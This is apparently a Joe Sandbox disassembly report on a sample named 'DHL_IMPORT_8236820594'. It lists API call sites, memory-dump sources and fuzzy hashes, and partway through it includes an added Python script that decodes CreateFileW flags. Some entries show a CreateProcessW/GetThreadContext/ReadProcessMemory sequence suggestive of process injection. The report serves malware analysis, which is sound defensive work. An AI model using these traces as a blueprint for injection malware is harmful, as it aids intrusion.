                                                                                          • DispatchMessageW.USER32(?), ref: 007DDB89
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007DDB9F
                                                                                          • Sleep.KERNEL32(0000000A), ref: 007DDBB1
                                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00821CC9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                          • String ID:
                                                                                          • API String ID: 3288985973-0
                                                                                          • Opcode ID: 1a4ebb62a6dc8b9ee9ae7581412b009c29a5d2105a690c661d076a9354b0a97c
                                                                                          • Instruction ID: 13b73ff500b00d270c1648a132dc2036efb39b4097c01288961f06d472c88f50
                                                                                          • Opcode Fuzzy Hash: 1a4ebb62a6dc8b9ee9ae7581412b009c29a5d2105a690c661d076a9354b0a97c
                                                                                          • Instruction Fuzzy Hash: 61F05E306443409BEB30CBA0DC4DFAA73B8FB45310F50492AE65AC31C0DB789888DB25
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 007E17F6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer
                                                                                          • String ID: CALL
                                                                                          • API String ID: 1385522511-4196123274
                                                                                          • Opcode ID: d0c5b4350facea53f332d76bac25c6cbb51a73eddea3b3d346ef0613467209d6
                                                                                          • Instruction ID: f154f1c66b48d74aad5f4d7bf08ccf73c9239d8e79d91056b1aff411005f3c4f
                                                                                          • Opcode Fuzzy Hash: d0c5b4350facea53f332d76bac25c6cbb51a73eddea3b3d346ef0613467209d6
                                                                                          • Instruction Fuzzy Hash: 06229B70609281DFC714DF15C485A2ABBF1FF89314F58896DF4968B3A2D739E891CB82
                                                                                          APIs
                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00812C8C
                                                                                            • Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2
                                                                                            • Part of subcall function 007D2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D2DC4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                          • String ID: X
                                                                                          • API String ID: 779396738-3081909835
                                                                                          • Opcode ID: b1cd5ab15276890b5a8dfda1d6d797e95df6f791209827d46213e4e6e424b56c
                                                                                          • Instruction ID: bf8073afccc9f1e44fa6841ee9154b9cde6428b2ff7a51f61d78539f21fb3f51
                                                                                          • Opcode Fuzzy Hash: b1cd5ab15276890b5a8dfda1d6d797e95df6f791209827d46213e4e6e424b56c
                                                                                          • Instruction Fuzzy Hash: 02219671A002589BDF41EF94C8497EE7BFCEF49304F00405AE505E7341EBB859898FA1
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,007D949C,?,00008000), ref: 007D5773
                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,007D949C,?,00008000), ref: 00814052
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 5828c63c0f152a77680a32c7f3ebfea622f1cfa1d16cb5943319fd64bb855dc6
                                                                                          • Instruction ID: 349c370ece3b6c7e5c61c2f84cd56138e454965f8e5bb4fda645851412118f0d
                                                                                          • Opcode Fuzzy Hash: 5828c63c0f152a77680a32c7f3ebfea622f1cfa1d16cb5943319fd64bb855dc6
                                                                                          • Instruction Fuzzy Hash: 56015631145625B7E3704A26DC0EF977F58EF06770F258311FA9C5A1E0CBB45854CB90
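The two CreateFileW entries above are easier to read once their hex stack values are mapped back to the Win32 constants: the first opens an existing file read-only, the second opens-or-creates one for read and write, both with full sharing. The script below is an added example for this page, not code from the report or from Joe Sandbox. It parses the "APIs" entry lines in the form shown on this page (bullet, optional "Part of subcall function" prefix, Name.MODULE, an optional parenthesised list of call-site stack values, and "ref:"), and assumes that the listed values are read in parameter order, so that the first seven values of a CreateFileW entry are its seven parameters and anything after them is whatever else sits on the stack. SAMPLE_LINES is constructed from entries on this page; the decoding tables hold the standard Win32 constant values.

```python
"""Parse the per-function "APIs" lists of a Joe Sandbox disassembly report
and decode the CreateFileW arguments they record.

Added example for this page; not part of the report or of Joe Sandbox.
The assumption that parenthesised values are parameters in call order
(extra values being further stack contents) is the reader's, not the tool's.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One entry: optional bullet, optional "Part of subcall function <addr>:",
# then Name.MODULE, an optional "(values)" list and the call-site "ref:".
API_LINE = re.compile(
    r"^\s*(?:\u2022|\*)?\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Standard Win32 values for the CreateFileW parameters decoded below.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# Constructed sample input, copied from entries visible on this page.
SAMPLE_LINES = [
    "• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,007D949C,?,00008000), ref: 007D5773",
    "• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,007D949C,?,00008000), ref: 00814052",
    "• __dosmaperr.LIBCMT ref: 00808739",
    "  • Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D1BF4",
    "• OleInitialize.OLE32 ref: 007D1388",
]


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                                   # call-site address in the dump
    args: List[Optional[int]] = field(default_factory=list)  # None for "?"
    caller: Optional[int] = None               # set for "Part of subcall function"


def _value(tok: str) -> Optional[int]:
    """A stack value: '?' means the sandbox could not resolve it."""
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_api_lines(lines) -> List[ApiCall]:
    """Return one ApiCall per line that matches the report's entry format."""
    calls = []
    for line in lines:
        m = API_LINE.match(line)
        if not m:
            continue                           # headers, hashes, dump sources
        raw = m.group("args")
        args = [_value(t) for t in raw.split(",")] if raw else []
        caller = m.group("caller")
        calls.append(ApiCall(name=m.group("name"), module=m.group("module"),
                             ref=int(m.group("ref"), 16), args=args,
                             caller=int(caller, 16) if caller else None))
    return calls


def _flag_names(value: int, table) -> str:
    names = [n for bit, n in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def decode_createfile(call: ApiCall):
    """Decode dwDesiredAccess (2nd), dwShareMode (3rd) and dwCreationDisposition
    (5th) of a CreateFileW entry; returns None for any other call."""
    if call.name != "CreateFileW" or len(call.args) < 5:
        return None
    access, share, disp = call.args[1], call.args[2], call.args[4]
    return {
        "ref": f"{call.ref:08X}",
        "access": "?" if access is None else _flag_names(access, GENERIC_ACCESS),
        "share": "?" if share is None else _flag_names(share, SHARE_MODE),
        "disposition": "?" if disp is None else DISPOSITION.get(disp, hex(disp)),
    }


def createfile_summary(lines):
    """All decoded CreateFileW entries in a list of report lines."""
    decoded = (decode_createfile(c) for c in parse_api_lines(lines))
    return [d for d in decoded if d is not None]


if __name__ == "__main__":
    for entry in createfile_summary(SAMPLE_LINES):
        print(entry)
```

Feeding the whole "APIs" section of a report through parse_api_lines gives a flat list of call sites that can be sorted by module or grouped by caller address, which is usually faster than reading the per-function entries one by one; the same decoding approach extends to other calls whose numeric parameters carry flags (the 0x80 sixth value here is FILE_ATTRIBUTE_NORMAL, for instance).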
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 007DBB4E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer
                                                                                          • String ID:
                                                                                          • API String ID: 1385522511-0
                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03ABB8FB
                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03ABB991
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03ABB9B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 2438371351-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          APIs
                                                                                            • Part of subcall function 007D4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E9C
                                                                                            • Part of subcall function 007D4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007D4EAE
                                                                                            • Part of subcall function 007D4E90: FreeLibrary.KERNEL32(00000000,?,?,007D4EDD,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4EC0
                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4EFD
                                                                                            • Part of subcall function 007D4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E62
                                                                                            • Part of subcall function 007D4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007D4E74
                                                                                            • Part of subcall function 007D4E59: FreeLibrary.KERNEL32(00000000,?,?,00813CDE,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4E87
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                          • String ID:
                                                                                          • API String ID: 2632591731-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wsopen_s
                                                                                          • String ID:
                                                                                          • API String ID: 3347428461-0
                                                                                          APIs
                                                                                            • Part of subcall function 00804C7D: RtlAllocateHeap.NTDLL(00000008,007D1129,00000000,?,00802E29,00000001,00000364,?,?,?,007FF2DE,00803863,008A1444,?,007EFDF5,?), ref: 00804CBE
                                                                                          • _free.LIBCMT ref: 0080506C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 614378929-0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 176396367-0
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000008,007D1129,00000000,?,00802E29,00000001,00000364,?,?,?,007FF2DE,00803863,008A1444,?,007EFDF5,?), ref: 00804CBE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?,?,008A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 007D4F6D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          APIs
                                                                                          • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0081EE51,00893630,00000002), ref: 0083CD26
                                                                                            • Part of subcall function 0083CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0083CD19,?,?,?), ref: 0083CC59
                                                                                            • Part of subcall function 0083CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0083CD19,?,?,?,?,0081EE51,00893630,00000002), ref: 0083CC6E
                                                                                            • Part of subcall function 0083CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0083CD19,?,?,?,?,0081EE51,00893630,00000002), ref: 0083CC7A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Pointer$Write
                                                                                          • String ID:
                                                                                          • API String ID: 3847668363-0
                                                                                          • Opcode ID: b3c7b0d6bfeff5efef1428c2b631f0bed33b9303e7b4619f525998f3f45b760a
                                                                                          • Instruction ID: eac18f8e5f67b317e1d6cd744a3b55daf479af043ed6f68882571097501fc130
                                                                                          • Opcode Fuzzy Hash: b3c7b0d6bfeff5efef1428c2b631f0bed33b9303e7b4619f525998f3f45b760a
                                                                                          • Instruction Fuzzy Hash: EFE03076400604EFC7219F4AD9008AABBF8FFC5250710852FE996D2110D3B5AA14DBA0
                                                                                          APIs
                                                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D2DC4
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongNamePath_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 541455249-0
                                                                                          • Opcode ID: d76f0f7d9c9ea178c829ccde00ec2685fa21c4e16e64ca5c0683a0fadcd89ca8
                                                                                          • Instruction ID: 93877461de5c48076c2c6392766cfe5d407b98c6dcc8ebedd2688874c4a144a1
                                                                                          • Opcode Fuzzy Hash: d76f0f7d9c9ea178c829ccde00ec2685fa21c4e16e64ca5c0683a0fadcd89ca8
                                                                                          • Instruction Fuzzy Hash: 06E0CD726041245BCB10A2589C09FEA77EDEFC8790F050072FD09D7348DA64AD808551
                                                                                          APIs
                                                                                            • Part of subcall function 007D3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D3908
                                                                                            • Part of subcall function 007DD730: GetInputState.USER32 ref: 007DD807
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007D2B6B
                                                                                            • Part of subcall function 007D30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 007D314E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                          • String ID:
                                                                                          • API String ID: 3667716007-0
                                                                                          • Opcode ID: b4b2d49049da61f142132eb721698b29abbf4ef8ecbef03176c0d35307266213
                                                                                          • Instruction ID: 80d8a7b6c20ae0bbb4c4b06ae293710d5172ec970c78ce1211a11f69c34c19e6
                                                                                          • Opcode Fuzzy Hash: b4b2d49049da61f142132eb721698b29abbf4ef8ecbef03176c0d35307266213
                                                                                          • Instruction Fuzzy Hash: 20E0862170424486CA04BB75A85E57DA77AABD6751F40153FF14283363DE6D494A4262
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00810704,?,?,00000000,?,00810704,00000000,0000000C), ref: 008103B7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: f289ee89d75701812b911b307ece94b7ffc231af202a0e546d1165aba5990b42
                                                                                          • Instruction ID: 8c1ada390269e52d1fc7502bdf92dd0d457f777b3f75f449ca2a5ede14d7afae
                                                                                          • Opcode Fuzzy Hash: f289ee89d75701812b911b307ece94b7ffc231af202a0e546d1165aba5990b42
                                                                                          • Instruction Fuzzy Hash: 52D06C3204010DBBDF028F84DD06EDA3BAAFB48714F014000FE5856020C772E821AB90
                                                                                          APIs
                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 007D1CBC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoParametersSystem
                                                                                          • String ID:
                                                                                          • API String ID: 3098949447-0
                                                                                          • Opcode ID: 80711f163051f31152efb1e592e208704c9156594c7aeff95888007a3c265abb
                                                                                          • Instruction ID: ad21e64bed08b3a5ac62a4a57df2c926041ab54aa08cf66781e6196779b1cbe0
                                                                                          • Opcode Fuzzy Hash: 80711f163051f31152efb1e592e208704c9156594c7aeff95888007a3c265abb
                                                                                          • Instruction Fuzzy Hash: A9C09B352803049FF6144B84BC4EF107754B349B10F045001F649559E3C3E11410DA50
                                                                                          APIs
                                                                                            • Part of subcall function 007D5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,007D949C,?,00008000), ref: 007D5773
                                                                                          • GetLastError.KERNEL32(00000002,00000000), ref: 008476DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 1214770103-0
                                                                                          • Opcode ID: fe9fa8e8ae1e90928967aa06976b06e1ef2c9a3bb22c5153c7a3c12e49cded3d
                                                                                          • Instruction ID: c47d694f6530169e7d057ea25feeb50b6eedaa04132e6fc129311f10b16fc274
